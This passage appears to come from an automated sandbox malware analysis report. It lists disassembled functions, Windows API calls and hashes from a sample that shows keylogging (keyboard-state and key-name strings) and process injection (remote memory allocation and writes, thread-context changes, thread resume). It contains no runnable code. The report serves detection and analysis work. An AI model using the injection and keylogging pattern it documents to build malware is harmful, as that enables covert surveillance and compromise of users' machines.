                                                                                                                                                                                              • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                                                              • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                              • String ID: T=G
                                                                                                                                                                                              • API String ID: 2315374483-379896819
                                                                                                                                                                                              • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                                                              Function 004477A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LocaleValid
                                                                                                                                                                                              • String ID: IsValidLocaleName$z=D
                                                                                                                                                                                              • API String ID: 1901932003-2791046955
                                                                                                                                                                                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                              • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                                                                                                                                                              Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID: T=G$T=G
                                                                                                                                                                                              • API String ID: 3519838083-3732185208
                                                                                                                                                                                              • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                                                                                                              • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                                                                                                                                                              Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                                                                                • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                              • String ID: [AltL]$[AltR]
                                                                                                                                                                                              • API String ID: 2738857842-2658077756
                                                                                                                                                                                              • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                                                                                                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                                                                              Function 00448813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 00448835
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                              • String ID: `@$`@
                                                                                                                                                                                              • API String ID: 1353095263-20545824
                                                                                                                                                                                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                              • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                                                                                                                                                              Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: State
                                                                                                                                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                              • API String ID: 1649606143-2446555240
                                                                                                                                                                                              • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                                                              • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                              Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,J@4fF,00412951,00000000,00000000,J@4fF,?,00000000), ref: 00412988
                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 00412998
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DeleteOpenValue
                                                                                                                                                                                              • String ID: J@4fF
                                                                                                                                                                                              • API String ID: 2654517830-1060276034
                                                                                                                                                                                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                              Function 0043FA6E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                              • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                              • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                              • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:10.4%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:182
                                                                                                                                                                                              Total number of Limit Nodes:4
                                                                                                                                                                                              execution_graph 15973 7832c80 15974 7832e0b 15973->15974 15975 7832ca6 15973->15975 15975->15974 15978 7832f00 15975->15978 15981 7832ef9 15975->15981 15979 7832f05 PostMessageW 15978->15979 15980 7832f6c 15979->15980 15980->15975 15982 7832efe PostMessageW 15981->15982 15984 7832f6c 15981->15984 15982->15984 15984->15975 15985 13bb9b8 15986 13bb9fa 15985->15986 15987 13bba00 GetModuleHandleW 15985->15987 15986->15987 15988 13bba2d 15987->15988 16181 13b4668 16182 13b4672 16181->16182 16184 13b4769 16181->16184 16185 13b477d 16184->16185 16189 13b4868 16185->16189 16193 13b4867 16185->16193 16191 13b488f 16189->16191 16190 13b496c 16190->16190 16191->16190 16197 13b44c4 16191->16197 16195 13b488f 16193->16195 16194 13b496c 16195->16194 16196 13b44c4 CreateActCtxA 16195->16196 16196->16194 16198 13b58f8 CreateActCtxA 16197->16198 16200 13b59bb 16198->16200 16200->16200 16201 13bdca8 DuplicateHandle 16202 13bdd3e 16201->16202 16203 13bda60 16204 13bdaa6 GetCurrentProcess 16203->16204 16206 13bdaf8 GetCurrentThread 16204->16206 16207 13bdaf1 16204->16207 16208 13bdb2e 16206->16208 16209 13bdb35 GetCurrentProcess 16206->16209 16207->16206 16208->16209 16210 13bdb6b GetCurrentThreadId 16209->16210 16212 13bdbc4 16210->16212 15989 7830b0d 15990 7830eea 15989->15990 15994 7831a38 15990->15994 15999 7831a48 15990->15999 15991 7830efa 15995 7831a48 15994->15995 16004 7831a79 15995->16004 16009 7831a88 15995->16009 15996 7831a6f 15996->15991 16000 7831a5d 15999->16000 16002 7831a79 12 API calls 16000->16002 16003 7831a88 12 API calls 16000->16003 16001 7831a6f 16001->15991 16002->16001 16003->16001 16005 7831a84 16004->16005 16014 7831d6b 16005->16014 16033 7831d78 16005->16033 16006 7831ac6 16006->15996 16010 7831a89 16009->16010 16012 7831d6b 12 API calls 16010->16012 16013 7831d78 12 API calls 16010->16013 16011 7831ac6 16011->15996 16012->16011 16013->16011 16015 7831d74 16014->16015 16016 7831d9f 16015->16016 16052 7831e94 16015->16052 16056 7832377 16015->16056 16061 7832030 16015->16061 16067 7831fb1 16015->16067 16072 783224f 16015->16072 16078 78325e8 16015->16078 16082 7832329 16015->16082 16087 7831f69 16015->16087 16092 783204a 16015->16092 16097 7832304 16015->16097 16102 7831f04 16015->16102 16108 7832426 16015->16108 16113 7832440 16015->16113 16117 7832502 16015->16117 16122 7832363 16015->16122 16127 7831ee3 16015->16127 16016->16006 16034 7831d79 16033->16034 16035 7831d9f 16034->16035 16036 7831ee3 4 API calls 16034->16036 16037 7832363 2 API calls 16034->16037 16038 7832502 2 API calls 16034->16038 16039 7832440 2 API calls 16034->16039 16040 7832426 2 API calls 16034->16040 16041 7831f04 4 API calls 16034->16041 16042 7832304 2 API calls 16034->16042 16043 783204a 2 API calls 16034->16043 16044 7831f69 2 API calls 16034->16044 16045 7832329 2 API calls 16034->16045 16046 78325e8 2 API calls 16034->16046 16047 783224f 4 API calls 16034->16047 16048 7831fb1 2 API calls 16034->16048 16049 7832030 4 API calls 16034->16049 16050 7832377 2 API calls 16034->16050 16051 7831e94 2 API calls 16034->16051 16035->16006 16036->16035 16037->16035 16038->16035 16039->16035 16040->16035 16041->16035 16042->16035 16043->16035 16044->16035 16045->16035 16046->16035 16047->16035 16048->16035 16049->16035 16050->16035 16051->16035 16133 78306e8 16052->16133 16137 78306df 16052->16137 16057 7832322 16056->16057 16141 7830210 16057->16141 16145 7830218 16057->16145 16058 7832890 16062 7831eef 16061->16062 16149 7830459 16062->16149 16153 7830460 16062->16153 16157 78302c8 16062->16157 16161 78302c0 16062->16161 16068 7831f80 16067->16068 16068->16016 16165 78303a0 16068->16165 16169 7830398 16068->16169 16069 78327cb 16073 7831eef 16072->16073 16073->16072 16074 78302c0 Wow64SetThreadContext 16073->16074 16075 78302c8 Wow64SetThreadContext 16073->16075 16076 7830460 WriteProcessMemory 16073->16076 16077 7830459 WriteProcessMemory 16073->16077 16074->16073 16075->16073 16076->16073 16077->16073 16080 7830460 WriteProcessMemory 16078->16080 16081 7830459 WriteProcessMemory 16078->16081 16079 7832403 16080->16079 16081->16079 16083 783256e 16082->16083 16084 7832336 16082->16084 16085 78302c0 Wow64SetThreadContext 16083->16085 16086 78302c8 Wow64SetThreadContext 16083->16086 16085->16084 16086->16084 16088 7831f6f 16087->16088 16090 78303a0 VirtualAllocEx 16088->16090 16091 7830398 VirtualAllocEx 16088->16091 16089 78327cb 16090->16089 16091->16089 16093 783206d 16092->16093 16095 7830460 WriteProcessMemory 16093->16095 16096 7830459 WriteProcessMemory 16093->16096 16094 78324b0 16094->16016 16095->16094 16096->16094 16098 783230a 16097->16098 16100 7830210 ResumeThread 16098->16100 16101 7830218 ResumeThread 16098->16101 16099 7832890 16100->16099 16101->16099 16103 7831eef 16102->16103 16104 7830460 WriteProcessMemory 16103->16104 16105 7830459 WriteProcessMemory 16103->16105 16106 78302c0 Wow64SetThreadContext 16103->16106 16107 78302c8 Wow64SetThreadContext 16103->16107 16104->16103 16105->16103 16106->16103 16107->16103 16109 7831f80 16108->16109 16111 78303a0 VirtualAllocEx 16109->16111 16112 7830398 VirtualAllocEx 16109->16112 16110 78327cb 16111->16110 16112->16110 16173 7830550 16113->16173 16177 7830548 16113->16177 16114 7832462 16118 783230b 16117->16118 16120 7830210 ResumeThread 16118->16120 16121 7830218 ResumeThread 16118->16121 16119 7832890 16119->16119 16120->16119 16121->16119 16123 7832370 16122->16123 16125 7830210 ResumeThread 16123->16125 16126 7830218 ResumeThread 16123->16126 16124 7832890 16125->16124 16126->16124 16128 7831eef 16127->16128 16129 78302c0 Wow64SetThreadContext 16128->16129 16130 78302c8 Wow64SetThreadContext 16128->16130 16131 7830460 WriteProcessMemory 16128->16131 16132 7830459 WriteProcessMemory 16128->16132 16129->16128 16130->16128 16131->16128 16132->16128 16134 78306ed CreateProcessA 16133->16134 16136 7830933 16134->16136 16136->16136 16138 78306e8 CreateProcessA 16137->16138 16140 7830933 16138->16140 16142 7830214 ResumeThread 16141->16142 16144 7830289 16142->16144 16144->16058 16146 7830219 ResumeThread 16145->16146 16148 7830289 16146->16148 16148->16058 16150 783045c WriteProcessMemory 16149->16150 16152 78304ff 16150->16152 16152->16062 16154 7830461 WriteProcessMemory 16153->16154 16156 78304ff 16154->16156 16156->16062 16158 78302cd Wow64SetThreadContext 16157->16158 16160 7830355 16158->16160 16160->16062 16162 78302c8 Wow64SetThreadContext 16161->16162 16164 7830355 16162->16164 16164->16062 16166 78303a5 VirtualAllocEx 16165->16166 16168 783041d 16166->16168 16168->16069 16170 78303a0 VirtualAllocEx 16169->16170 16172 783041d 16170->16172 16172->16069 16174 7830551 ReadProcessMemory 16173->16174 16176 78305df 16174->16176 16176->16114 16178 783054c ReadProcessMemory 16177->16178 16180 78305df 16178->16180 16180->16114

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 013BDA60 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 526 13bda60-13bdaef GetCurrentProcess 530 13bdaf8-13bdb2c GetCurrentThread 526->530 531 13bdaf1-13bdaf7 526->531 532 13bdb2e-13bdb34 530->532 533 13bdb35-13bdb69 GetCurrentProcess 530->533 531->530 532->533 534 13bdb6b-13bdb71 533->534 535 13bdb72-13bdb8a 533->535 534->535 539 13bdb93-13bdbc2 GetCurrentThreadId 535->539 540 13bdbcb-13bdc2d 539->540 541 13bdbc4-13bdbca 539->541 541->540
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 013BDADE
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 013BDB1B
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 013BDB58
                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 013BDBB1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2063062207-0
                                                                                                                                                                                              • Opcode ID: f42e18d88b127cb5d22e472f5b71af9837f4b67dc0ab075b28c039847244f9da
                                                                                                                                                                                              • Instruction ID: 139bb375163ab781c1a5d34a02e22ecd727857a7ba27d6adf248d93d21d7a7fc
                                                                                                                                                                                              • Opcode Fuzzy Hash: f42e18d88b127cb5d22e472f5b71af9837f4b67dc0ab075b28c039847244f9da
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F5154B09002098FDB54DFAAD588BDEBBF1BF88318F20C459D519A7360D774A884CF65
                                                                                                                                                                                              Function 078306DF Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 569 78306df-78306e6 570 78306e8-78306ec 569->570 571 78306ed-783077d 569->571 570->571 573 78307b6-78307d6 571->573 574 783077f-7830789 571->574 579 78307d8-78307e2 573->579 580 783080f-783083e 573->580 574->573 575 783078b-783078d 574->575 577 78307b0-78307b3 575->577 578 783078f-7830799 575->578 577->573 581 783079b 578->581 582 783079d-78307ac 578->582 579->580 584 78307e4-78307e6 579->584 590 7830840-783084a 580->590 591 7830877-7830931 CreateProcessA 580->591 581->582 582->582 583 78307ae 582->583 583->577 585 7830809-783080c 584->585 586 78307e8-78307f2 584->586 585->580 588 78307f6-7830805 586->588 589 78307f4 586->589 588->588 593 7830807 588->593 589->588 590->591 592 783084c-783084e 590->592 602 7830933-7830939 591->602 603 783093a-78309c0 591->603 594 7830871-7830874 592->594 595 7830850-783085a 592->595 593->585 594->591 597 783085e-783086d 595->597 598 783085c 595->598 597->597 599 783086f 597->599 598->597 599->594 602->603 613 78309c2-78309c6 603->613 614 78309d0-78309d4 603->614 613->614 615 78309c8 613->615 616 78309d6-78309da 614->616 617 78309e4-78309e8 614->617 615->614 616->617 618 78309dc 616->618 619 78309ea-78309ee 617->619 620 78309f8-78309fc 617->620 618->617 619->620 621 78309f0 619->621 622 7830a0e-7830a15 620->622 623 78309fe-7830a04 620->623 621->620 624 7830a17-7830a26 622->624 625 7830a2c 622->625 623->622 624->625 627 7830a2d 625->627 627->627
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0783091E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                              • Opcode ID: ef91c398262c6dd4d3e2e745ce3a29073baddf398fa4bf783b727fb376f6d2c6
                                                                                                                                                                                              • Instruction ID: 081832a7393f11b936918bd40212dfa45b1297d2409bf3e522dfdbb555ef9629
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef91c398262c6dd4d3e2e745ce3a29073baddf398fa4bf783b727fb376f6d2c6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 86913AB1D0021ADFEB24DF68C8417EEBBB2EF54314F1481A9E848E7240DB759985CF92
                                                                                                                                                                                              Function 078306E8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 628 78306e8-783077d 631 78307b6-78307d6 628->631 632 783077f-7830789 628->632 637 78307d8-78307e2 631->637 638 783080f-783083e 631->638 632->631 633 783078b-783078d 632->633 635 78307b0-78307b3 633->635 636 783078f-7830799 633->636 635->631 639 783079b 636->639 640 783079d-78307ac 636->640 637->638 642 78307e4-78307e6 637->642 648 7830840-783084a 638->648 649 7830877-7830931 CreateProcessA 638->649 639->640 640->640 641 78307ae 640->641 641->635 643 7830809-783080c 642->643 644 78307e8-78307f2 642->644 643->638 646 78307f6-7830805 644->646 647 78307f4 644->647 646->646 651 7830807 646->651 647->646 648->649 650 783084c-783084e 648->650 660 7830933-7830939 649->660 661 783093a-78309c0 649->661 652 7830871-7830874 650->652 653 7830850-783085a 650->653 651->643 652->649 655 783085e-783086d 653->655 656 783085c 653->656 655->655 657 783086f 655->657 656->655 657->652 660->661 671 78309c2-78309c6 661->671 672 78309d0-78309d4 661->672 671->672 673 78309c8 671->673 674 78309d6-78309da 672->674 675 78309e4-78309e8 672->675 673->672 674->675 676 78309dc 674->676 677 78309ea-78309ee 675->677 678 78309f8-78309fc 675->678 676->675 677->678 679 78309f0 677->679 680 7830a0e-7830a15 678->680 681 78309fe-7830a04 678->681 679->678 682 7830a17-7830a26 680->682 683 7830a2c 680->683 681->680 682->683 685 7830a2d 683->685 685->685
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0783091E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1868658022.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7830000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                              • Opcode ID: e9891a40b6bffa5db805cfbde1f9833fb79621474be1ec59a31b68c97b0ea4ff
                                                                                                                                                                                              • Instruction ID: 6e424a9483f286bd998f0a52e3921a12eb5472f24d55375900f03366e1df5bd6
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9891a40b6bffa5db805cfbde1f9833fb79621474be1ec59a31b68c97b0ea4ff
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B9149B1D0021ADFEB24DFA8C8417EEBBB2BF44314F1481A9D848E7240DB759985CF92
                                                                                                                                                                                              Function 013B44C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 686 13b44c4-13b59b9 CreateActCtxA 689 13b59bb-13b59c1 686->689 690 13b59c2-13b5a1c 686->690 689->690 697 13b5a2b-13b5a2f 690->697 698 13b5a1e-13b5a21 690->698 699 13b5a31-13b5a3d 697->699 700 13b5a40 697->700 698->697 699->700 701 13b5a41 700->701 701->701
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013B59A9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1850566839.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_13b0000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                              • Opcode ID: 7bacae7cae5c2172091cecbdad10858e2d4193996eee0afe2e841c829d911e73
                                                                                                                                                                                              • Instruction ID: 00e986788f774bdc3ecbe75802fc53025b6d3c14ea83f48e1ff96e99f231a622
